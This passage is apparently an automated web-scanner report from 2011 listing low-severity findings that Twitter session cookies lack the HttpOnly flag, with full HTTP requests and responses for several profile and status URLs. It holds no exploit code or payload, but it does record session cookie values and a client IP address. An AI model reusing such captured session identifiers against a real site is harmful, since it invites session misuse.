Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 302 Found
Date: Fri, 28 Jan 2011 14:28:28 GMT
Server: hi
Status: 302 Found
Location: http://twitter.com/login?redirect_after_login=%2Fmalsup%2Ffollowers
X-Runtime: 0.00329
Content-Type: text/html; charset=utf-8
Content-Length: 133
Cache-Control: no-cache, max-age=300
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CToOcmV0dXJuX3RvIihodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL2Zv%250AbGxvd2VyczoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0%250AIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNo%250AewAGOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--4024847b7caa44727b74ae89efd07cb29e96d23b; domain=.twitter.com; path=/
Expires: Fri, 28 Jan 2011 14:33:25 GMT
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<html><body>You are being <a href="http://twitter.com/login?redirect_after_login=%2Fmalsup%2Ffollowers">redirected</a>.</body></html>

11.119. http://twitter.com/malsup/following

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /malsup/following

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (see the Set-Cookie headers in the response below). The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /malsup/following HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 302 Found
Date: Fri, 28 Jan 2011 14:28:26 GMT
Server: hi
Status: 302 Found
Location: http://twitter.com/login?redirect_after_login=%2Fmalsup%2Ffollowing
X-Runtime: 0.00243
Content-Type: text/html; charset=utf-8
Content-Length: 133
Cache-Control: no-cache, max-age=300
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CToOcmV0dXJuX3RvIihodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL2Zv%250AbGxvd2luZzoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0%250AIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNo%250AewAGOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--148959b3be71f317b0f559b6a54c3a0c718e618f; domain=.twitter.com; path=/
Expires: Fri, 28 Jan 2011 14:33:24 GMT
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<html><body>You are being <a href="http://twitter.com/login?redirect_after_login=%2Fmalsup%2Ffollowing">redirected</a>.</body></html>

11.120. http://twitter.com/malsup/lists/memberships

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /malsup/lists/memberships

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (see the Set-Cookie headers in the response below). The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /malsup/lists/memberships HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:28:30 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224909-80319-15886
ETag: "c8e3bcf74656418e1966d131ca1712ec"
Last-Modified: Fri, 28 Jan 2011 14:28:29 GMT
X-Runtime: 0.29750
Content-Type: text/html; charset=utf-8
Content-Length: 53194
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CToMY3NyZl9pZCIlOTY3NDUzZWYzNmZkNjRmZmZhNWVmMDJlMjczNTIz%250AYWI6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d2b7d333c4ae3616cea1972ad8fcfbf90f4504; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.121. http://twitter.com/malsup/status/28104072506638336

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /malsup/status/28104072506638336

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /malsup/status/28104072506638336 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:28:22 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224902-83509-7686
ETag: "149ada5c80b5766764f47c9a0f52a4c1"
Last-Modified: Fri, 28 Jan 2011 14:28:22 GMT
X-Runtime: 0.06341
Content-Type: text/html; charset=utf-8
Content-Length: 13677
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8yODEwNDA3MjUwNjYzODMzNjoMY3NyZl9pZCIlNWNkZDU3ZjRlMjQy%250AN2Q4MTA4MmM0NDFhZDg5MjY2YzI6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--e0b142d583ea9a31999ba97ee4a16fb9f6b484a2; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.122. http://twitter.com/malsup/status/28148269980852225

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /malsup/status/28148269980852225

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /malsup/status/28148269980852225 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:28:21 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224901-67249-7024
ETag: "c7d9e91873275c60e828220131e3d24e"
Last-Modified: Fri, 28 Jan 2011 14:28:21 GMT
X-Runtime: 0.05497
Content-Type: text/html; charset=utf-8
Content-Length: 13572
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8yODE0ODI2OTk4MDg1MjIyNToMY3NyZl9pZCIlMjhjNDM2MTNkMDIw%250ANDA2NjMwMjM2MDE1YmViMWNhOWI6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--53ddf4f09f23d5fa1c2283d7064ce993e37290a9; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.123. http://twitter.com/malsup/status/28172705220009984

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /malsup/status/28172705220009984

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /malsup/status/28172705220009984 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:28:23 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224903-20411-54978
ETag: "1d3dce7c8cc9257454fd818d254f7abb"
Last-Modified: Fri, 28 Jan 2011 14:28:23 GMT
X-Runtime: 0.29056
Content-Type: text/html; charset=utf-8
Content-Length: 13615
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8yODE3MjcwNTIyMDAwOTk4NDoMY3NyZl9pZCIlNDAwZTU3MDIwZTI2%250AOGRjM2FkZTAwZDZiN2FkNDkxZTY6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--f11730b84ce50cbf6bd93caab79b94724f2f389a; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.124. http://twitter.com/malsup/status/28172927228706816

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /malsup/status/28172927228706816

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /malsup/status/28172927228706816 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:28:17 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224897-95647-22549
ETag: "9e559c9fc45aceb0c6ca126ade823c32"
Last-Modified: Fri, 28 Jan 2011 14:28:17 GMT
X-Runtime: 0.05413
Content-Type: text/html; charset=utf-8
Content-Length: 13565
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8yODE3MjkyNzIyODcwNjgxNjoMY3NyZl9pZCIlMThlMTViODg0ZThh%250AZWQxZDY1MTRiYmFiYmUzNzlmNTU6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--c8db7209ce1246cbe1047e0cb576ed58c5085c73; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.125. http://twitter.com/malsup/status/28176483855896578

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /malsup/status/28176483855896578

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /malsup/status/28176483855896578 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:27:53 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224873-94611-54894
ETag: "9b55cdcf81cadef11b9b4336e0d1dfae"
Last-Modified: Fri, 28 Jan 2011 14:27:53 GMT
X-Runtime: 0.33314
Content-Type: text/html; charset=utf-8
Content-Length: 13615
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8yODE3NjQ4Mzg1NTg5NjU3ODoMY3NyZl9pZCIlYmEwMDczN2YyZjhl%250AZGZlZDk2OGM2ZmRjZDJmZTM1N2M6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--2a2ab9129448d1d35a9123d4379ea42935434e7c; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.126. http://twitter.com/malsup/status/28206363616215040

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /malsup/status/28206363616215040

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /malsup/status/28206363616215040 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:27:44 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224864-76272-48360
ETag: "c834532c607a57bdbcfb09d898913ad5"
Last-Modified: Fri, 28 Jan 2011 14:27:44 GMT
X-Runtime: 0.06435
Content-Type: text/html; charset=utf-8
Content-Length: 13839
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8yODIwNjM2MzYxNjIxNTA0MDoMY3NyZl9pZCIlMzJhZDdhZWE4YTVi%250ANmI0N2NhYjc2Y2UzNjcwYmQ5NGQ6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--14d983691f33e1b982c79a5b234b9091c5640cfd; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.127. http://twitter.com/malsup/status/28450557672824832

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /malsup/status/28450557672824832

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /malsup/status/28450557672824832 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:27:22 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224842-72786-11424
ETag: "8a913eb0d26cf4b51ef377e6d58d6b3a"
Last-Modified: Fri, 28 Jan 2011 14:27:22 GMT
X-Runtime: 0.06597
Content-Type: text/html; charset=utf-8
Content-Length: 13675
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8yODQ1MDU1NzY3MjgyNDgzMjoMY3NyZl9pZCIlNWU2ZTIzZGIyYjk5%250AODhkOTAwNjg4NThhZjkxOGU2MmU6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--e2496f1dbb064b5c8414d329ac11463253046feb; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.128. http://twitter.com/malsup/status/28451243869339648

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /malsup/status/28451243869339648

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /malsup/status/28451243869339648 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:26:19 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224779-24208-21272
ETag: "4dec5d0def9c15c79fc9b85459882692"
Last-Modified: Fri, 28 Jan 2011 14:26:19 GMT
X-Runtime: 0.05780
Content-Type: text/html; charset=utf-8
Content-Length: 13734
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8yODQ1MTI0Mzg2OTMzOTY0ODoMY3NyZl9pZCIlY2UxZTYzZWM1Mzhi%250ANzUwOTg5MmZhODg2NzBlNTE3ZmE6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--92abfd30a75287ea7b714b4c2d719303b28dc49f; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.129. http://twitter.com/malsup/status/29343613573926913

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /malsup/status/29343613573926913

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /malsup/status/29343613573926913 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
